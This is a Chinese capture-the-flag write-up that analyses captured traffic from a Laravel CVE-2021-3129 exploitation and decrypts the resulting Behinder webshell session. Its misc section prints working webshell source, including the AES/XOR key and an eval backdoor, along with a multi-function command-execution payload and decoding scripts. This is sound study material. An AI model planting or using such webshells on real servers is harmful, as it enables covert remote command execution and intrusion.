本文主要是介绍第二届黄河流域团队赛个人wp,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
个人wp
web
两个题都几乎是网上的原题,不想多说了,放个链接,重点记录一下自己第一次遇到的misc 冰蝎流量分析
web1 https://blog.csdn.net/qq_51768842/article/details/125153850
web2 https://blog.csdn.net/m0_73512445/article/details/135266070
web2后面用不到反弹shell,js原型链污染即可
misc
LL
一开始看到很多目录扫描的流量404,直接过滤掉,命令
http &&http.response.code!=404
过滤后,找最后的200的流量包,发现都是加密的密文,于是再往前寻找,发现有几个流量包值得注意
这个请求一看就是读取什么文件,似乎是文件包含,有好几个包都是这个,感觉有蹊跷,上网搜了一下Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution
,发现这几个payload是利用php laravel框架的一个漏洞的,CVE-2021-3129,大佬的文章:https://www.cnblogs.com/xiaoyunxiaogang/p/16913350.html
poc大多都要利用filter写入日志,而且payload会用quoted-printable编码一下,于是寻找有quoted-printable编码字符串的流量包,找一下跟/_ignition/execute-solution
交互的流量包,条件
http.request.uri contains "/_ignition/execute-solution"
在6787这个流量包中找到了
按照上一个图中,filter的编码顺序,对应解码一下,ai写的脚本
<?php
//把那很长的一串粘贴过来
$string="...";
$stream = fopen("php://memory", "r+");
fwrite($stream, $string);
rewind($stream);// 将流过滤器附加到数据流上
stream_filter_append($stream, 'convert.quoted-printable-decode');
stream_filter_append($stream, 'convert.iconv.utf-16le.utf-8');
stream_filter_append($stream, 'convert.base64-decode');// 读取并输出解码后的字符串
while (!feof($stream)) {echo fread($stream, 8192);
}// 关闭数据流
fclose($stream);
?>
发现
中间这里有很多base64,还写入了about.php,看看是什么东西,base64解码完
<?php
@error_reporting(0);
session_start();$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond$_SESSION['k']=$key;session_write_close();$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64_"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i++) {$post[$i] = $post[$i]^$key[$i+1&15]; }}else{$post=openssl_decrypt($post, "AES128", $key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p."");}}@call_user_func(new C(),$params);
?>
还真是webshell,命令的流量都会经过加密,上网查了一下发现这是冰蝎的webshell,那么最后一个流量包里的很简短的应答应该就是flag
虽然这里写了aes密钥,但拿去在线的aes解密还是不太对,还是得从这个webshell本身的解密方式来,稍微改一下拿来解密即可
选最后的流量包中加密的命令解密
还要base64解码,
@error_reporting(0);
function main($content)
{$result = array();$result["status"] = base64_encode("success");$result["msg"] = base64_encode($content);@session_start(); //初始化session,避免connect之后直接background,后续getresult无法获取cookieecho encrypt(json_encode($result));
}function encrypt($data)
{@session_start();$key = $_SESSION['k'];if(!extension_loaded('openssl')){for($i=0;$i<strlen($data);$i++) {$data[$i] = $data[$i]^$key[$i+1&15];}return $data;}else{return openssl_encrypt($data, "AES128", $key);}
}
$content="cW1sdXE4bDlLcXpMV21aZm9WUXVkQU82N0NSTmF6c0xGeWZESzg3SUhIemhXMEdqWlRIRzNmSDVPYjVISUdBVmFoUVNnZlQ1RkxUU1JXWFF2aUhnZ1hCeVpueXpVeWhuSFJKcm9yODdEaGZtazRyc3ZxRG53bE1OZFVDaDRic0ZwSndHUTFsdGZmWURITnN4eEtXM2djeFJhbWx2NXFRVlZmNXNnMENaZHI2ZWZJdkVPY21xN1VvSGhuNWczUFJ0ZUJSNEE0NlE2djNYbTVMWXN5cHdoM3NQZUJFWGhpaVBSWEprb09wSFJRR3hlcEttQXRrT2hmcW1lVDRreHBHenh2VmNwalA2THVXODlYWnRRUU44MzNHSGRyd2pNTEFkYlFSTVZ5RFk3ZlhhaktLeFhkV0UyOXZoQ0Rvb2FVSGp5a29LNUc2eXBWdlJGVkY4dDVuNUlLZHNscEFaemVzUmR6QjNFNnRqUGNYYlRReHg0Mm1Sd1phUGMxOWhud1MyUzVLOTRYMmJRYjFkbUliYWpHWEdBSFRoY2o1YUl4QzdmWXZ2YUxSVkxSbmV4RmNOckF1MWFieGUwdzhPMFpza3JXVER2WHpTeFlpZzBwTXNEVU5POGtnakhzZzAxU1lNQVc4cE5pWENnN3RWaUVKazQ1MHJJRVpXS3IzNjMwekQyRTZNdTRFZWIyc2hoSXFvQjQxSHMwZHlFZ2Q3UlV6NjVlMDA2S3NpdzBwQVZVQVQ5VWVPSUw0a21lRmR6WlpVVTFIN0pNUHZoM3ZiYXdxUlBLbTBTTmxiQTN2Z2k3Z2cxR1BWdVljZXRrQ2lVNUlYS1N0RW1sVXNTT3RLWWNnSXdUTWY0eDR5WTBLMjRFT0txRlI0QzE5WEJaczl2dFUxMlBPTDdZZDZTaXc3VTRIbzFqaGFrN0FpQWllZXlPS3FVNHNYSzVMeXFERFhsY2dtOHM0cDVhSjBJQXZTaGpXeGptck8yTVpWeDNyend1blRyR3lGM2pZUmhUZTE2eXRMVUdMRXZMY3MwNTJsaHBjalBPbkE3aUdOZThTMzNzT3hhaWtuRXFDblVEWG42UWlob2czRzduRTZZOGpnN25FRk9YSmJqOVcyNzNnNVRIOEM4WEI1dW9kbnN2dEtOeTNNVDh0UGloUmdOTjh5MXg4aTBpYVEyY2R4QWhIb1JBUjFpSEFNTzdKVjNSVmlyYWhZbzZTT1g0cUxQOVNrRk1teXpjeXI3Rkt0dlN0eDNwa3ZnOFB6YnFLdGpUaXZUWWVndEl2Y0tJeGE3NHY4VktsalhDUW4zRzZVWnozenJEWEV1dE1ibHAzVDBQRUw2bDZyYU5QbzI3SGhDWm1hU2o2Qm5YNGVTVVVMYWJHV1RDRUlBWk8yTWp1bWxMRGJqY252QUF6QXg3ckRBR05rNG9LZnVRZmt6bUJhZlYyRXVmRDN5YUpxTTN2TDZ6d0JzQnVwMGN3SFN4a0tLVTJ2aW5oQWNUMXJsa3NRQTIzMzZHVjZBYWZ0NE1GTUo2czJLYVphVklIN3BJUWZWUDVoeThJYTF3MDZMV3c3d0p3amlCRlc1VjU2bzljZ3IyNkwxOERxaHdZVTB0WHVFdmFacnRBdlVDUHFmOHZPU2JjMUxleU5HZ0V0TzZyTkFxRWZSRmJmSmpqdGtUSGdacWdKU1pXVXBVUFRmUW9MMHhua1NjejNWV2Q0emxnakpjRmFLUU9ZS1h3am1WWGY1d1FYNlpTT1B3UjZuZmpqWVZ6bTBPazNlaDBtQm1GRkhyVmhUQ0E2T2xsR1dZVkdJVHV4d3UxdGU=";$content=base64_decode($content);
main($content);
冰蝎真是喜欢套娃,继续base64,
<?php
@error_reporting(0);function getSafeStr($str) {$s1 = iconv('utf-8', 'gbk//IGNORE', $str);$s0 = iconv('gbk', 'utf-8//IGNORE', $s1);if ($s0 == $str) {return $s0;} else {return iconv('gbk', 'utf-8//IGNORE', $str);}
}function main($cmd, $path) {@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time', 0);$result = array();$PadtJn = @ini_get('disable_functions');if (!empty($PadtJn)) {$PadtJn = preg_replace('/[, ]+/', ',', $PadtJn);$PadtJn = explode(',', $PadtJn);$PadtJn = array_map('trim', $PadtJn);} else {$PadtJn = array();}$c = $cmd;if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {$c = $c . " 2>&1\n";}$JueQDBH = 'is_callable';$Bvce = 'in_array';if ($JueQDBH('system') && !$Bvce('system', $PadtJn)) {ob_start();system($c);$kWJW = ob_get_contents();ob_end_clean();} else if ($JueQDBH('proc_open') && !$Bvce('proc_open', $PadtJn)) {$handle = proc_open($c, array(array('pipe', 'r'),array('pipe', 'w'),array('pipe', 'w')), $pipes);$kWJW = NULL;while (!feof($pipes[1])) {$kWJW .= fread($pipes[1], 1024);}@proc_close($handle);} else if ($JueQDBH('passthru') && !$Bvce('passthru', $PadtJn)) {ob_start();passthru($c);$kWJW = ob_get_contents();ob_end_clean();} else if ($JueQDBH('shell_exec') && !$Bvce('shell_exec', $PadtJn)) {$kWJW = shell_exec($c);} else if ($JueQDBH('exec') && !$Bvce('exec', $PadtJn)) {$kWJW = array();exec($c, $kWJW);$kWJW = join(chr(10), $kWJW) . chr(10);} else if ($JueQDBH('popen') && !$Bvce('popen', $PadtJn)) {$fp = popen($c, 'r');$kWJW = NULL;if (is_resource($fp)) {while (!feof($fp)) {$kWJW .= fread($fp, 1024);}}@pclose($fp);} else {$kWJW = 0;$result["status"] = base64_encode("fail");$result["msg"] = base64_encode("none of proc_open/passthru/shell_exec/exec/popen is available");$key = $_SESSION['k'];echo encrypt(json_encode($result));return;}$result["status"] = base64_encode("success");$result["msg"] = base64_encode(getSafeStr($kWJW));echo encrypt(json_encode($result));
}function encrypt($data) {@session_start();$key = $_SESSION['k'];if (!extension_loaded('openssl')) {for ($i = 0; $i < strlen($data); $i++) {$data[$i] = $data[$i] ^ $key[$i + 1 & 15];}return $data;} else {return openssl_encrypt($data, "AES128", $key);}
}$cmd = "Y2QgL2QgIkQ6XHBocHN0dWR5X3Byb1xXV1dcbGFyYXZlbFwiJnR5cGUgZmxhZy50eHQ=";
$cmd = base64_decode($cmd);
$path = "RDovcGhwc3R1ZHlfcHJvL1dXVy9sYXJhdmVsLw==";
$path = base64_decode($path);
main($cmd, $path);
?>
完整的webshell浮出水面,解密一下命令
cd /d "D:\phpstudy_pro\WWW\laravel\"&type flag.txt
还真是在查看flag,观察main函数可知,命令的结果就是被一开始那个加密方式加密的,直接解密
上网找资料时发现,还可以用puzzlesolver工具跑解密,需要冰蝎连接的密码,把密码rebeyond加入puzzlesolver的字典即可
puzzsolver真乃神器
4.0版本的解密webshell,以后解题要先确认版本
<?php
@error_reporting(0);
function Decrypt($data)
{$key="e45e329feb5d925b"; $bs="base64_"."decode";$after=$bs($data."");for($i=0;$i<strlen($after);$i++) {$after[$i] = $after[$i]^$key[$i+1&15]; }return $after;
}
$post=Decrypt(file_get_contents("php://input"));
eval($post);
?>
这篇关于第二届黄河流域团队赛个人wp的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!